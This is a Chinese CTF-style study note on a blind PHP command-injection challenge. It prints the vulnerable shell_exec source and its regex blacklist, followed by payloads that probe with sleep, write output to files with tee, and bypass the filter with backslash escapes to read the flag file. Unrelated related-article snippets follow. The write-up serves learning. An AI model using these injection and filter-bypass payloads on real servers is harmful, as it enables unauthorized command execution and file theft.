RCE-PLUS (学习记录)

devtools/2024/12/28 6:49:03/

源码

<?php
error_reporting(0);
highlight_file(__FILE__);
function strCheck($cmd)
{if(!preg_match("/\;|\&|\\$|\x09|\x26|more|less|head|sort|tail|sed|cut|awk|strings|od|php|ping|flag/i", $cmd)){return($cmd);}else{die("i hate this");      }
}
$cmd=$_GET['cmd'];
strCheck($cmd);
shell_exec($cmd);
?>

过滤了很多东西,但是空格什么的没过滤

发现是用shell_exec()无回显的命令执行,所以把文件写入txt看结果

判断指令
?cmd=ls / | sleep 5
把回显输入文本文件

两种方法

?cmd=ls / | tee 1.txt
?cmd=ls / > tee 1.txt

 直接访问

绕过对cat和flag的过滤
?cmd=c\at /fl\ag | tee 2.txt
?cmd=c\at /fl\ag > tee 2.txt

总结

无回显RCE

WAF绕过


http://www.ppmy.cn/devtools/146035.html

相关文章

大语言模型的token和向量

现在大语言模型火了&#xff0c;像 ChatGPT 什么的&#xff0c;能回答问题、写文章&#xff0c;。但它们为啥这么聪明呢&#xff1f;这就和向量、Token 有关系。那怎么通过向量、Token来理解我们的问题呢。看完这篇文章就知道了 token Token 就像是语言里的小积木&#xff0c…

前后端分离(前端删除数据库数据)

1.实现思路前端把用户Id用axios请求发送给后端&#xff0c;后端获取id&#xff0c;把用户数据删除并返回给前端一个删除成功响应 2.编写axios请求代码 const deleteEmployee async (empNo) > {try {const response await axios.delete(http://localhost:8080/api/delEmp,…

洞察 Facebook:用户行为与社交趋势

Facebook&#xff0c;作为全球最大社交平台之一&#xff0c;长期占据社交媒体的主导地位。自2004年成立以来&#xff0c;Facebook不仅影响了人们的社交方式&#xff0c;还推动了数字社交文化的演变。本文将洞察Facebook上的用户行为和社交趋势&#xff0c;探讨其如何塑造现代社…

天融信网络安全基础知识3

1.如果一个网站存在CSRF漏洞&#xff0c;可以通过CSRF漏洞做什么&#xff1f; D A获取网站用户注册的个人资料信息 B修改网站用户注册的个人资料信息 C冒用网站用户的身份发布信息 D以上都可以 2.Firefox浏览器插件Hackbar提供的功能没有什么&#xff1f;C A.修改浏览器访问…

Linux网络 | 网络计算器客户端实现与Json的安装以及使用

前言&#xff1a;本节讲述序列化和反序列化的相关内容。 这节的内容是博主前一篇博客的续章&#xff0c; 里面用到了很多知识点都是前一篇文章的。 友友们如果要学习序列化反序列化&#xff0c; 直接看本篇文章是看不懂的&#xff0c; 请看前一篇文章&#xff1a;linux网络 | 序…

深度学习-论文即插即用模块1

[深度学习] 即插即用模块详解与实践 深度学习近年来已经成为人工智能的核心驱动力&#xff0c;各种模型和技术被广泛应用于图像处理、自然语言处理、语音识别等领域。然而&#xff0c;构建深度学习模型的过程通常复杂且耗时。为了提高开发效率并降低技术门槛&#xff0c;“即插…

模型 卡尼曼系统

系列文章 分享 模型&#xff0c;了解更多&#x1f449; 模型_思维模型目录。直觉快思&#xff0c;理性慢想。 1 模型 卡尼曼系统的应用 1.1 直播购物APP中的卡尼曼系统应用案例 案例背景&#xff1a; 在直播购物APP中&#xff0c;平台通过展示单个用户的视角视频来向用户推荐…

计算机网络 (10)网络层

前言 计算机网络中的网络层&#xff08;Network Layer&#xff09;是OSI&#xff08;开放系统互连&#xff09;模型中的第三层&#xff0c;也是TCP/IP模型中的第二层&#xff0c;它位于数据链路层和传输层之间。网络层的主要任务是负责数据包从源主机到目的主机的路径选择和数据…